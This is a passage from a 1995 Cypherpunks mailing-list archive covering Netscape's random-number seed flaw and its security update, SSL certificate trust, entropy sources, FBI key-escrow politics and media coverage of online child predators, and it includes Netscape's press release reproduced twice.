conclusion. The most important thing to be doing right now is to _understand_ what's happening. Over the next couple of weeks, I'll be reading the S/MIME and X.509 documentation, poring over reference code, and (of course) playing with Netscape 2.0 myself. We're much more likely to get our agenda implemented if we are armed with a good understanding. There are lots of ways around X.509 - maybe we can work our way around it, maybe we can adapt it to our needs, maybe we can come up with something better and get it replaced. Whatever the case may be, we should not give up hope. Netscape is one manifestation of the ancient Chinese curse: may we live in interesting times! Raph From jeffb at sware.com Mon Sep 25 14:13:36 1995 From: jeffb at sware.com (Jeff Barber) Date: Mon, 25 Sep 95 14:13:36 PDT Subject: SSL Man-in-the-middle In-Reply-To: Message-ID: <9509252112.AA29743@wombat.sware.com> Simon Spero writes: > Exactly - the trust model used in Navigator 1.1N requires you to trust > every single owner of a valid certificate. Getting hold of any key is > vastly easier than having to obtain a specific key; in the worst case, > you just buy your own - SSL exchanges are repudiable, and a few simple > tricks can make sure you cerificiate doesn't show up in the "Document ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ > Information" dialog box. I'd appreciate some documentation for this, please. How can you make this happen? -- Jeff From norm at netcom.com Mon Sep 25 14:25:25 1995 From: norm at netcom.com (Norman Hardy) Date: Mon, 25 Sep 95 14:25:25 PDT Subject: "random" number seeds vs. Netscape Message-ID: At 12:29 PM 9/24/95, Ed Carp [khijol SysAdmin] wrote: .... >I learned the hard way - keep the transmitters away from a reverse-biased >doide acting as a noise generator. Only until I examined the output did >I realize it wasn't random. I fixed it, though, by looking at the output >and testing its randomness. .... Very interesting. I wouldn't be too sure that a transmitted signal at a single frequency is the only signal that an opponent could use to bias your random numbers. How do you "test for randomness". I think that signal to noise arguments, phrased in terms of entropy, can protect you against unknown and unwanted signal. (Ironically you want a very low signal to noise ratio!) Perhaps you merely take n/(S/N) bits from the HRNG when you need n bits and run them thru MD5. Here S is the signal strength of the maximum plausible unwanted signal, and N is the noise of the diode. I encourage both diode theorists and information theorists to quibble with the above formula! From karlton at netscape.com Mon Sep 25 14:43:02 1995 From: karlton at netscape.com (Phil Karlton) Date: Mon, 25 Sep 95 14:43:02 PDT Subject: Netscape "random" number seed generator code available In-Reply-To: <4454nu$da8@tera.mcom.com> Message-ID: <3067219B.167E@netscape.com> > Will you put a picture up on http://www.netscape.com/ someone does find > a problem? If you look at my home page (see below), you can see a picture from about 25 years ago. If I have to shave my head, I will post before and after pictures. PK -- Philip L. Karlton karlton at netscape.com Principal Curmudgeon http://www.netscape.com/people/karlton Netscape Communications Corporation From paulp at CERF.NET Mon Sep 25 14:51:32 1995 From: paulp at CERF.NET (Paul Phillips) Date: Mon, 25 Sep 95 14:51:32 PDT Subject: Golden Coy Freeh In-Reply-To: <199509251253.IAA07006@pipe4.nyc.pipeline.com> Message-ID: On Mon, 25 Sep 1995, John Young wrote: > The New York Times, January 25, 1995, p. D5. > > The F.B.I. Sting Operation on Child Pornography Raises > Questions About Cryptography > > By Peter H. Lewis > > [snip] > > If the head of the F.B.I. acknowledged that his agency was > powerless to crack a cryptography program like Pretty Good > Privacy, the stampede for that software on the Internet > would make the run on Windows 95 look puny. That's a bizarre and naive statement. Is there anyone that thinks the spread of strong crypto has been less than rapid only because people are afraid it won't protect them against the government? Um, sorry, no. -- Paul Phillips | "Click _here_ if you do not | have a graphical browser" | -- Canter and Siegel, on | their short-lived web site From sharborth at hai-net.com Mon Sep 25 15:08:05 1995 From: sharborth at hai-net.com (sharborth at hai-net.com) Date: Mon, 25 Sep 95 15:08:05 PDT Subject: Net KiddiePorn Hype on TV Message-ID: <9508258120.AA812078118@houston_cc_smtp.hai-net.com> That's not all. This morning I was listening to National Peoples Radio when there was a story about the "Cyber Angels." It appears that the "Guardian Angels" from NYC are now out on the net trying to catch people talking about child pornography. This will be real interesting to watch. I don't remember all of the story, but the best part I heard was when some "Cyber Angel" was talking about listening a chat session and according to her, GIFs are codewords for pornography. wsh ______________________________ Reply Separator _________________________________ Subject: Net KiddiePorn Hype on TV Author: cypherpunks at toad.com (Cypherpunks Mailing List) at internet Date: 25-09-95 11:28 Yet Another Alarmist TV Show About Child Molesters on the Net: During their coverage of an NFL game on Sunday, the Fox announcers plugged an upcoming episode (sometime this week) of _New York Undercover_. They used a depressing line like "Think the Net is a safe place to play ? Think again !" Apparently the show will portray a child molester luring kids via the Net, etc., etc. "In a story pulled straight from today's headlines !" Anyway, the mainstream media trashing of the Net continues. Check your local listings. -Futplex From unicorn at polaris.mindport.net Mon Sep 25 15:09:18 1995 From: unicorn at polaris.mindport.net (Black Unicorn) Date: Mon, 25 Sep 95 15:09:18 PDT Subject: Golden Coy Freeh In-Reply-To: <199509251253.IAA07006@pipe4.nyc.pipeline.com> Message-ID: On Mon, 25 Sep 1995, John Young wrote: > The New York Times, January 25, 1995, p. D5. > > The F.B.I. Sting Operation on Child Pornography Raises > Questions About Cryptography > > By Peter H. Lewis > > > Last week, Mr. Freeh stressed that he preferred a voluntary > approach. But "if consensus is impossible" on the > encryption issue, he said, the F.B.I. might consider other > approaches. > I think it *tremendously* disturbing that the F.B.I. suddenly thinks itself part of the Legislative branch, able to make law and dictate policy to the rest of the country. In fact there is a plague of this kind of thing, law making in the wrong channels, as if the executive agencies in the United States were suddenly able to implement their own law. I think the F.B.I. needs to act like the Executive agency it is, advice the president, and then generally shut up. In short, like small children, the F.B.I. should be seen, and not heard. Unfortunately, I believe the children in this case will be Citizens of the United States. > > [End] --- "In fact, had Bancroft not existed, potestas scientiae in usu est Franklin might have had to invent him." in nihilum nil posse reverti 00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information From jsw at neon.netscape.com Mon Sep 25 15:13:06 1995 From: jsw at neon.netscape.com (Jeff Weinstein) Date: Mon, 25 Sep 95 15:13:06 PDT Subject: Netscape "random" number seed generator code available In-Reply-To: <199509251256.IAA27310@gatekeeper.itribe.net> Message-ID: <4479g1$7ai@tera.mcom.com> In article <199509251256.IAA27310 at gatekeeper.itribe.net>, bianco at itribe.net (David J. Bianco) writes: > On Sep 25, 2:38, Phil Karlton sent the following to the NSA's mail > archives: > > Subject: Netscape "random" number seed generator code available > || As is mentioned in the README, more will need to be done to find more > || bits of entropy. (Too much of a good thing is still not enough.) > || However the security team believes that the RNG seed is no longer the > || weak link and candidate for attack. So I am personally volunteering > || to have my had shaved if a discovered deficiency in this code results > || in an easily attacked generated seed. [You will be expected to show > || your work. :-)] > || > > Will you put a picture up on http://www.netscape.com/ someone does find > a problem? 8-) I will make sure that a picture is available on the web if Phil has to shave his head. --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From rah at shipwright.com Mon Sep 25 15:17:56 1995 From: rah at shipwright.com (Robert Hettinga) Date: Mon, 25 Sep 95 15:17:56 PDT Subject: PM's Netscape rant Message-ID: At 3:24 PM 9/25/95, Vladimir Z. Nuri wrote: > however I haven't seen any >well-deserved rebuttals however, so.. I believe I've seen enough. <*PLONK!*> Now, that's why I *bought* Eudora... Cheers, Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com) Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 USA (617) 323-7923 "Reality is not optional." --Thomas Sowell >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From unicorn at polaris.mindport.net Mon Sep 25 15:25:36 1995 From: unicorn at polaris.mindport.net (Black Unicorn) Date: Mon, 25 Sep 95 15:25:36 PDT Subject: PM's Netscape rant In-Reply-To: <199509251924.MAA05096@netcom18.netcom.com> Message-ID: On Mon, 25 Sep 1995, Vladimir Z. Nuri wrote: > I thoroughly enjoyed PM's vituperative, venemous, and vitriolic > Netscape rant. it just wouldn't be the cypherpunks list without > the pit bull of the internet nipping at everyone's heels here > and slaying any unwarranted peace!! however I haven't seen any > well-deserved rebuttals however, so.. > > I'm again going to be a netscape apologist and say, GEEZ, PM, > will you take it easy, and untangle your underwear knots? > > as has been pointed out numerous times, the encryption in the Netscape > code is designed to handle credit c rd number transport, *not* > actual cash transport. its really silly to have more security > present than is available than the weakest link. it would be like > worrying about a fence around the white house when one is giving > open tours to the public every day!! Uh, there is a fence around the White House and they do give daily tours. I might add that there are a good number of people who worry about it every day. I might also add that it is even more silly to design a software package, where additional security might easily be added, which has too little security to be expanded into other roles. This is called 'designed obsolesence.' Wells Fargo bank is allowing account transactions over their webpage, one assumes this does, or will soon include "cash transfers." > > PM is rather secretive about the systems he is working on, but > I suspect they are stock systems that must be highly secure because > they actually involve *transfer* of cash, and *large*amounts* of it, > in a *time-critical* environment, with *large corporate clients*. these > are all inappropriate criteria to judge Netscape by. I believe this is a demonstration of your lack of vision, "vznuri." Netscape's potential in the next 8-12 months alone dictates that they should be concentrating on attracting corporate clients, as does their new obligation to stockholders who have yet to see a penny of profit not related to speculation and stock price fluxuation. in the Netscape > scenario, the software is *not* transfering cash itself, *not* transferring > large amounts of it, and *not* in a time critical application, and *not* > geared toward large corporations, but instead individual users. > it is relying on another infrastructure (credit cards) for the actual > transaction mechanisms. For now, perhaps. It seem you would have that limitation written in stone. > > as has been pointed out numerous times, the whole > credit card apparatus is somewhat based on "security through obscurity", > i.e. the obscurity of a credit card number, and it doesn't make a whole > lot of sense to try to make this more "secure". I'm not quite sure you mean this, but if you do, you're just small minded. Why don't you read it again. this is a problem for > credit card companies to fix (I agree it is a horrible problem, that costs > us billions, and should have been fixed a long time ago) .. but holding > credit card *using* companies responsible for this deficiency > doesn't make sense. they are not the enemy!! they would surely seize the > most secure mechanism available, if there were alternatives. There are, they haven't. > the distinction is subtle, but I think a relevant one: Then it's unfortunate that you have missed it so completely. > is > the software itself transfering cash, or building on another system > that does so? hopefully in the latter case, the requirements for a > successful implementation are not so difficult to achieve (so that > even fresh-out-of-college CS students can call the functions to > do so, and perhaps code packages are written such that the user > is protected from their own naivete, or what PM would call stupidity > or incompetence). Looking at Netscape, and moreover, the entire set of browsing programs, you speak like a petty government offical. By limiting the scope of potential of various browsers you do nothing to further the cause of easy to reach strong crypto for everyone in a transparent and widely distributed package. Instead you believe we should forgive Netscape it's oversights (and carelessness) because it was never meant to transfer funds over the internet. "It's a petty program, you should ignore it" is what you're really saying, which completely misses the fact, that millions of people are using/going to use it, and they are as likely to use it for banking as for shopping at home as for 'surfing.' Then again, perhaps your intent was never to make strong encryption available to the masses. > -- > > PM gives some excellent techniques for improving code security (some > of these may not be exactly what he proposed): > > 1. hiring experts > 2. code reviews > 3. restrictions of who can work on what code (security clearance) > 4. heavy testing > 5. antagonistic attacks (i.e. hiring someone trying to crack the code that > others have written) > 6. open review of key code > > however, put all these things together and you get a company apparatus > a bit more like the NSA than a commercial company. I agree that all > these precaution are relevant for banking and stock transaction software > transferring millions of dollars. but holding a joe-schmoe GUI and > Web company responsible for this kind of paranoid oversight is really > impossible and unrealistic and *unnecessary*. > > there will be some companies that specialize in creating the > *secure*infrastructure* for communications transactions. other companies > will just *latch on* to this existing infrastructure. hopefully the > requirements for *latching on* will not be too difficult, otherwise we > are all in trouble!! > > now, admittedly, it would be ideal if the netscape code was highly > secure, but again, I just don't think it is in the best interests of > this company to become security paranoid to the degrees that I have > listed above, and the extreme degrees that people here are ranting about. > rather they should try to blend in with other companies > who specialize in cryptographic security. the latter companies should > as much as possible provide foolproof modules. they should take care > of all functions that have a potential for problem, such as random > number generation, key exchange, etc. they should try to provide > a minimum of training where the code is not foolproof. > > many have been making the point that one cannot judge the security of > a package based simply on analyzing key modules. I actually don't think this > has been proven in general and completely resolved yet. I can imagine > modules that communication with software such that the module > itself is a "secure environment" in general, and > it is almost impossible to misuse the software itself. (for example, > the software might never store the actual keys of transactions itself, > this being handled by a secure module, making it impossible to > accidentally reveal them). > > some day we might actually see "secure module support" built into a > microprocessor. in many ways the microprocessors that guard against > illegal memory accesses and illegal function calls are in a sense > providing a kind of cryptographic security. and people who study > secure OSes generally eventually conclude that for ultimate security, > you almost have to work from the ground up, starting with memory, > microprocessors, and network hardware. > > -- > > so my general point is that PM's rant, while lots of fun to read.. > > >you @#$%^&* whippersnappers!! you don't have a @#$%^&* clue about > >REAL code!! us old timers were writing code as secure and impenetrable > >as granite bricks, impregnable as a frigid victorian gandmother, > >before you were a twinkle in your mama's eye!! learn some > >sufficent grovelling skills for your superiors or you will > >not only be fired from your JOB but be excommunicated from the > >entire INDUSTRY, perhaps even tarred, feathered, drawn, quartered, and > >hung from your neck in the nearest tree!!! your employer will throw > >you to the wolves, your customers will spit on your flayed carcass, > >your family will look upon your shrivelled remains with shame, the > >vultures will vomit your undigestable eviscerated entrails, > >and the world immediately explode, if you have a > >SINGLE BUFFER OVERFLOW *anywhere* in your code!! > > (ahem) this is not appropriate in the context of Netscape's aims, unless they > want to become financial transaction experts more in line with banking > expertise. netscape is more a "bring cyberspace to the masses" company, > not "bring secure transactions to cyberspace". it's just because so > few companies are successfully doing the latter, that netscape is forced > to implement some "key" aspects of it to support the former. but I suspect > they may ease out of the cryptographic security business in the long run, > delegating it to other companies' plug-in-packages. > > furthermore, cyberspace is growing gradually. the way we get to really > incredible secure transactions is through a growing process, an evolution > in which mistakes are made at different levels, and which in the beginning > the software is not much more than a toy that looks pretty and has the > fewest moving parts and most simplistic design imaginable. > > I fully believe that some day a company in cyberspace will exist > that satisfies PM's and all other cypherpunk's most erotic dreams > about secure transactions. however that day is years away and it > will take a long time to reach it. and I doubt that it will be the > same company that is playing around with GUI's for the end user and > hiring college programming hot-shots and Java geeks. IMHO netscape > is probably not going to be the company that will try to bring the > *lowlevel infrastructure* for cash, judging by the current winds, > although that could change. they will definitely help guide its > progress and be interacting with the companies that do, however. > > when the big Secure Transactions Inc. company is invented for > cyberspace, *then* the kinds of absolutely uncompromising standards that PM > embodies will be in place. but again, we cannot expect the companies > of today to embody that ideology and atmosphere for a few years yet. > > the cypherpunks play a very valuable role in finding these "growing > pain" mistakes of beginning companies such as Netscape, > but we are not really serving our own best interests or the > harmonious growth of cyberspace by vilifying/ embarrassing/ > browbeating/ humiliating companies or their employees over their security > problems, at least if they are clearly responsive to far less ammunition. > keep in mind that NSA unbreakable security is *just*not*appropriate* in > every situation, and in fact "weak" encryption does have legitimate > uses (i.e. in a world where people routinely lock their keys in their > cars). (although I agree, in general one should always try to design a > system to be as secure as possible.) > > (oops, I used the term "we" in that paragraph, a grave cypherpunk sin.. > my humble apologies; @#$%^&* cryptoanarchist vocabulary) > > that all said, nevertheless, I do enjoy PM's periodic displays of > undigestable bile eruptions at least as much as one of the other > infamous amusing crackpots circulating in this corner of cyberspace.. > (but geez, PM, were you raised by a pack of wild wolves or what?) > > p.s. to TCM: why do you continually find my login name abbreviation so > fascinating??? my apologies to anyone if I am missing some kind of > inside joke here, I'm a little dense at times > > --- "In fact, had Bancroft not existed, potestas scientiae in usu est Franklin might have had to invent him." in nihilum nil posse reverti 00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information From jsw at neon.netscape.com Mon Sep 25 15:46:44 1995 From: jsw at neon.netscape.com (Jeff Weinstein) Date: Mon, 25 Sep 95 15:46:44 PDT Subject: SSL Man-in-the-middle In-Reply-To: <199509251247.IAA27297@gatekeeper.itribe.net> Message-ID: <447bes$7ai@tera.mcom.com> In article , ses at tipper.oit.unc.edu (Simon Spero) writes: > Exactly - the trust model used in Navigator 1.1N requires you to trust > every single owner of a valid certificate. Getting hold of any key is > vastly easier than having to obtain a specific key; in the worst case, > you just buy your own - SSL exchanges are repudiable, and a few simple > tricks can make sure you cerificiate doesn't show up in the "Document > Information" dialog box. Can you explain to me how you would get the Navigator to accept your certificate, but not display anything in the "Document Information" dialog? --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From sameer at c2.org Mon Sep 25 16:06:25 1995 From: sameer at c2.org (sameer) Date: Mon, 25 Sep 95 16:06:25 PDT Subject: WSJ on Netscape Hole 3 In-Reply-To: Message-ID: <199509252300.QAA29812@infinity.c2.org> He's -asking- for an exploit. Tshirts to Ray and the person who does the exploit, if it gets written. Maybe I should just ring up 8lgm and have them do one. > > On Mon, 25 Sep 1995, John Young wrote: > > > The Wall Street Journal, September 25, 1995, p. B12. > > > Marc Andreessen, vice president of technology at Netscape, > > said the company will issue fixes for the recent glitches > > later this week. He added that it's unclear whether > > anything other than temporarily crashing a user's computer > > could result trom the recent flaw. > > Oh Marc, you didn't really want to say that, did you? > > -Thomas > -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 An Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From harveyrj at vt.edu Mon Sep 25 16:13:20 1995 From: harveyrj at vt.edu (R. J. Harvey) Date: Mon, 25 Sep 95 16:13:20 PDT Subject: Golden Coy Freeh Message-ID: <9509252313.AA22112@toad.com> At 06:10 PM 9/25/95 -0400, Black Unicorn wrote: >On Mon, 25 Sep 1995, John Young wrote: >> >> Last week, Mr. Freeh stressed that he preferred a voluntary >> approach. But "if consensus is impossible" on the >> encryption issue, he said, the F.B.I. might consider other >> approaches. >> > >I think it *tremendously* disturbing that the F.B.I. suddenly thinks >itself part of the Legislative branch, able to make law and dictate >policy to the rest of the country. > >In fact there is a plague of this kind of thing, law making in the wrong >channels, as if the executive agencies in the United States were suddenly >able to implement their own law. > Today I attended the Telecommunications Conference here in Blacksburg sponsored by Rep. Rick Boucher (D-VA), in which an interesting cast of characters (including Clarence Irving, Asst Secretary of Commerce for Telecommunication Policy, and presidents and Sr. VPs of Sprint, Time-Warner, GTE, Bell Atlantic) served as panelists. One purpose of the conference was to discuss the upcoming conference committee that will try to reconcile the House and Senate telco reform bills (which Boucher will likely be on). After hearing each of these folks stress the importance of competitiveness, privacy, and security, during the Q&A session I asked the panel what they thought about the likelihood of government-mandated key escrow, which the FBI and others are likely to push. Only Boucher stood up to address the question, and he offered a forceful denunciation of the entire logic of mandated escrow, citing the litany of reasons against it, including the observation that it was ridiculous from a competitiveness standpoint, noting that no foreign customers would ever buy such systems because of the fear that, among others, "the CIA would be reading their mail." He hastened to note that although he felt strongly that in the current congress the calls for mandatory key escrow would go nowhere, "things could look very different" after the next round of elections. The guy from Commerce had nothing to say on the question. rj ------------------------------------------------------------ R. J. Harvey email: harveyrj at vt.edu WWW for job analysis/personality: http://harvey.psyc.vt.edu/ PGP key at http://harvey.psyc.vt.edu/RJsPGPkey.txt From jkandt at mail.wsdot.wa.gov Mon Sep 25 16:19:35 1995 From: jkandt at mail.wsdot.wa.gov (Jeff Kandt) Date: Mon, 25 Sep 95 16:19:35 PDT Subject: Net KiddiePorn Hype on TV Message-ID: > That's not all. This morning I was listening to National Peoples > Radio when there was a story about the "Cyber Angels." It appears > that the "Guardian Angels" from NYC are now out on the net trying to > catch people talking about child pornography. > > This will be real interesting to watch. I don't remember all of the > story, but the best part I heard was when some "Cyber Angel" was > talking about listening a chat session and according to her, GIFs are > codewords for pornography. > > wsh I heard that piece too. Sounded like a total PR move for Curtis Slewah(sp?) and his Guardian Angels. They certainly didn't sound like they knew what they were doing, technically speaking. Representatives from the EFF _AND_ the FBI talked about their "concerns" over private attempts to patrol cyberspace. The EFF representative pointed out that when you "see" a 15 yo female being propositioned by a 45 yo male you really have no idea if either party is what they purport to be. The FBI guy pointed out that there is no provision in the current law for anyone other than law enforcement to posess child pornography and the mere act of downloading such images, even if the intention is to turn them over to the police, would put the "Angels" in violation of the law; also concerned that they might get in the way of police undercover investigations. Slewah himself admitted that there is no way to guarantee that his "Angels" don't tend towards pedophilia themselves and might not have completely pure motives. -Jeff ------- Jeff Kandt "They that give up essential liberty to obtain a little jkandt at wsdot.wa.gov temporary safety deserve neither liberty nor safety." Ph:(360)664-3510 (W) --Benjamin Franklin, 1759 PGP Fingerprint: F1 59 8F 88 85 4F 2F 65 C2 5F D3 B5 8C 71 E0 E3 From jsw at netscape.com Mon Sep 25 16:20:41 1995 From: jsw at netscape.com (Jeff Weinstein) Date: Mon, 25 Sep 95 16:20:41 PDT Subject: Security Update news release Message-ID: <9509251617.ZM167@tofuhut> Here is the press release we put out this morning regarding the fix for RNG seed and stack overflow problems. --Jeff BETA VERSIONS OF NETSCAPE SECURITY UPDATE TO BE AVAILABLE WEDNESDAY FOR FREE DOWNLOADING Company Puts New Code on Net for Examination; Outside Security Experts Reviewing Software MOUNTAIN VIEW, Calif. (September 25, 1995) -- Netscape Communications Corporation (NASDAQ: NSCP) today announced that it has completed beta versions of the security update for its client and server software and will post the new software for free downloading from the Internet on Wednesday, September 27. The beta versions of the software updates, being posted following a review by internal and outside experts, are in response to the potential vulnerability in the company's security implementation discovered last weekend by two University of California at Berkeley students. In addition, Netscape is taking the opportunity to include other improvements with this update. Netscape addressed the potential vulnerability by increasing the amount of random information it uses to seed the random number generator in its security implementation. In Netscape's security approach, the random number generated is used in a mathematical formula to create a "session key" for encrypting information to be sent across the Internet. The new solution uses many times more random information than the previous version, ensuring much greater degrees of difficulty in identifying the key used to encrypt a particular session. The solution is also now assembled in a platform-dependent manner which, when combined with the increase in random information, makes Netscape's products substantially more secure than before the update. Netscape's source code that will be used to address the potential vulnerability has already been posted on the Internet so that it can be reviewed by anyone wishing to do so. This technique is often used in the development of security software to ensure the highest level of inspection possible before the final software is made available to customers. The code is also being reviewed by external security experts retained by Netscape and various Netscape platform partners with expertise in specific operating system environments to provide additional checks on the soundness of Netscape's approach. "We have always encouraged users to provide feedback on new versions of our software, and our posting of this security source code on the Internet is a natural extension of that approach," said Mike Homer, vice president of marketing at Netscape. "We plan to continue to use the Internet to test new software versions, as we will shortly with the beta version of our newly announced Netscape Navigator 2.0. We expect that this kind of open review will help us continue to create products of the highest quality." Netscape is using the opportunity of this week's beta releases to also update other portions of its software, addressing such issues as domain-name limitations in international versions of Netscape Navigator� and potential stack overflow conditions. Netscape is also placing the beta versions of the security updates for its Netscape servers on the Internet for free download by customers. "We process hundreds of customer orders daily using Netscape software. Netscape's commitment to excellence as evidenced by the company's immediate action in response to reported vulnerabilities is one of the many reasons Internet Shopping Network has chosen Netscape products for conducting Internet commerce," said Randy Adams, president of Internet Shopping Network. "We have built a multi-million dollar business on the Internet using Netscape products and they are a major factor in our success." The beta versions of the updated software -- Netscape Navigator 1.2.1b for Windows, Netscape Navigator 1.1.1b for Macintosh and UNIX, Netscape Commerce Server� 1.1.1b, and Netscape Proxy Server� 1.1.1b -- will be available on Wednesday for downloading from Netscape's home page at http://home.netscape.com. All Netscape users are encouraged to download the new versions as soon as possible to ensure they are using the most up-to-date security software from Netscape. Final versions of the updates will be posted after all testing is complete. Netscape Communications Corporation is a premier provider of open software to enable people and companies to exchange information and conduct commerce over the Internet and other global networks. The company was founded in April 1994 by Dr. James H. Clark, founder of Silicon Graphics, Inc., a Fortune 500 computer systems company; and Marc Andreessen, creator of the NCSA Mosaic� research prototype for the Internet. Traded on Nasdaq under the symbol "NSCP", Netscape Communications Corporation is based in Mountain View, California. ### Additional information on Netscape Communications Corporation is available on the Internet at http://home.netscape.com, by sending email to info at netscape.com or by calling 415-528-2555. Netscape Communications, the Netscape Communications logo, Netscape, Netscape Navigator, Netscape Commerce Server and Netscape Proxy Server are trademarks of Netscape Communications Corporation. All other product names are trademarks of their respective companies. -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. We issued the following news release this morning: ---------------------- FOR IMMEDIATE RELEASE BETA VERSIONS OF NETSCAPE SECURITY UPDATE TO BE AVAILABLE WEDNESDAY FOR FREE DOWNLOADING Company Puts New Code on Net for Examination; Outside Security Experts Reviewing Software MOUNTAIN VIEW, Calif. (September 25, 1995) -- Netscape Communications Corporation (NASDAQ: NSCP) today announced that it has completed beta versions of the security update for its client and server software and will post the new software for free downloading from the Internet on Wednesday, September 27. The beta versions of the software updates, being posted following a review by internal and outside experts, are in response to the potential vulnerability in the company's security implementation discovered last weekend by two University of California at Berkeley students. In addition, Netscape is taking the opportunity to include other improvements with this update. Netscape addressed the potential vulnerability by increasing the amount of random information it uses to seed the random number generator in its security implementation. In Netscape's security approach, the random number generated is used in a mathematical formula to create a "session key" for encrypting information to be sent across the Internet. The new solution uses many times more random information than the previous version, ensuring much greater degrees of difficulty in identifying the key used to encrypt a particular session. The solution is also now assembled in a platform-dependent manner which, when combined with the increase in random information, makes Netscape's products substantially more secure than before the update. Netscape's source code that will be used to address the potential vulnerability has already been posted on the Internet so that it can be reviewed by anyone wishing to do so. This technique is often used in the development of security software to ensure the highest level of inspection possible before the final software is made available to customers. The code is also being reviewed by external security experts retained by Netscape and various Netscape platform partners with expertise in specific operating system environments to provide additional checks on the soundness of Netscape's approach. "We have always encouraged users to provide feedback on new versions of our software, and our posting of this security source code on the Internet is a natural extension of that approach," said Mike Homer, vice president of marketing at Netscape. "We plan to continue to use the Internet to test new software versions, as we will shortly with the beta version of our newly announced Netscape Navigator 2.0. We expect that this kind of open review will help us continue to create products of the highest quality." Netscape is using the opportunity of this week's beta releases to also update other portions of its software, addressing such issues as domain-name limitations in international versions of Netscape Navigator� and potential stack overflow conditions. Netscape is also placing the beta versions of the security updates for its Netscape servers on the Internet for free download by customers. "We process hundreds of customer orders daily using Netscape software. Netscape's commitment to excellence as evidenced by the company's immediate action in response to reported vulnerabilities is one of the many reasons Internet Shopping Network has chosen Netscape products for conducting Internet commerce," said Randy Adams, president of Internet Shopping Network. "We have built a multi-million dollar business on the Internet using Netscape products and they are a major factor in our success." The beta versions of the updated software -- Netscape Navigator 1.2.1b for Windows, Netscape Navigator 1.1.1b for Macintosh and UNIX, Netscape Commerce Server� 1.1.1b, and Netscape Proxy Server� 1.1.1b -- will be available on Wednesday for downloading from Netscape's home page at http://home.netscape.com. All Netscape users are encouraged to download the new versions as soon as possible to ensure they are using the most up-to-date security software from Netscape. Final versions of the updates will be posted after all testing is complete. Netscape Communications Corporation is a premier provider of open software to enable people and companies to exchange information and conduct commerce over the Internet and other global networks. The company was founded in April 1994 by Dr. James H. Clark, founder of Silicon Graphics, Inc., a Fortune 500 computer systems company; and Marc Andreessen, creator of the NCSA Mosaic� research prototype for the Internet. Traded on Nasdaq under the symbol "NSCP", Netscape Communications Corporation is based in Mountain View, California. ### Additional information on Netscape Communications Corporation is available on the Internet at http://home.netscape.com, by sending email to info at netscape.com or by calling 415-528-2555. Netscape Communications, the Netscape Communications logo, Netscape, Netscape Navigator, Netscape Commerce Server and Netscape Proxy Server are trademarks of Netscape Communications Corporation. All other product names are trademarks of their respective companies. Rosanne M. Siino Director of Corporate Communications Netscape Communications Corp. 415-528-2619 From dvw at hamachi.epr.com Mon Sep 25 16:20:48 1995 From: dvw at hamachi.epr.com (David Van Wie) Date: Mon, 25 Sep 95 16:20:48 PDT Subject: `Random' seed. Message-ID: <306738C3@hamachi> Matt Blaze wrote: >Here's my current favorite quick-and-dirty true-random-in-software generator. >Use at own risk and read the comments carefully... [...] > * Physically random numbers (very nearly uniform) > * D. P. Mitchell > * Modified by Matt Blaze 2/95 [...] > * WARNING: depending on the particular platform, truerand() output may > * be biased or correlated. In general, you can expect about 16 bits of > * "pseudo-entropy" out of each 32 bit word returned by truerand(), > * but it may not be uniformly diffused. While this comment provides some general information, it does not give the expected entropy in the form of testable assumptions. A first step in this direction is to provide the entropy series used to arrive at the 16 bit per 32 bit word estimate. The second step, as I recommended last week (RE: RNG Resource FAQ... on 9/22), is to provide a concise argument drawn directly from the mathematical weaknesses of the entropy series. In that post, I posed the following four criteria because they address the mathematical (theoretical) weaknesses of the entropy series, while using a vocabulary that should be sensible to a rigorous designer: 1) The states exist and can be identified. 2) The number of states n is known. 3) The index value i uniquely identifies a state. 4) The function P_i is known and well-behaved. In this way, an analyst can review both the entropy series itself, and a _concise_ statement of the criteria under which the series is defined (i.e. when the 4 mathematical weaknesses have been appropriately addressed), and the argument "why" has been scrutinized against the code or proposed design. dvw From dvw at hamachi.epr.com Mon Sep 25 16:35:08 1995 From: dvw at hamachi.epr.com (David Van Wie) Date: Mon, 25 Sep 95 16:35:08 PDT Subject: More on "Entropy" Message-ID: <30673C18@hamachi> David Van Wie wrote: >>The entropy E is defined by the sum across n states of -P_i log_2(P_i), Timothy C. May wrote: >Hah! Another physicist converted to the information-theoretic view of entropy! Indeed. I was able to track down the literature, and it is most interesting. I am still a little bit skeptical of the "superset including thermodynamic entropy" school of thought, but I haven't finished reading all of the materials yet! Clearly, the IT "version" of entropy is a well defined and useful thing.... >I should've pointed out in my reading list that several names stand out in >this interpretation: I'll read with that endoresement in mind. Your thoughts on rigorous, _concise_, design criteria for sources of entropy would be appreciated (unless there is good quality work in the literature I haven't come to yet). dvw From dvw at hamachi.epr.com Mon Sep 25 16:48:37 1995 From: dvw at hamachi.epr.com (David Van Wie) Date: Mon, 25 Sep 95 16:48:37 PDT Subject: Netscape "random" number seed generator code available Message-ID: <30673F3B@hamachi> Phil Karlton wrote: >[You will be expected to show your work. :-)] In the spirit of showing work, how about a run through the entropy series? dvw From rah at shipwright.com Tue Sep 26 04:57:33 1995 From: rah at shipwright.com (Robert Hettinga) Date: Tue, 26 Sep 95 04:57:33 PDT Subject: The Law of ElectronicCommerce: EDI, E-mail and Internet Message-ID: --- begin forwarded text Date: Mon, 25 Sep 1995 20:49:03 -0700 From: Davidwfox at eworld.com To: www-buyinfo at allegra.att.com, e-payment at bellcore.com Subject: The Law of ElectronicCommerce: EDI, E-mail and Internet FYI... Little Brown and Co. announces release of _The Law of Electronic Commerce: EDI, E-mail and Internet_ (Second Edition) by Benjamin Wright. This 640 page book has been updated to cover the latest developments in electronic commerce, including the Utah Digital Signature Act, electronic cash, computer records, and Internet commerce. For more information, contact Little, 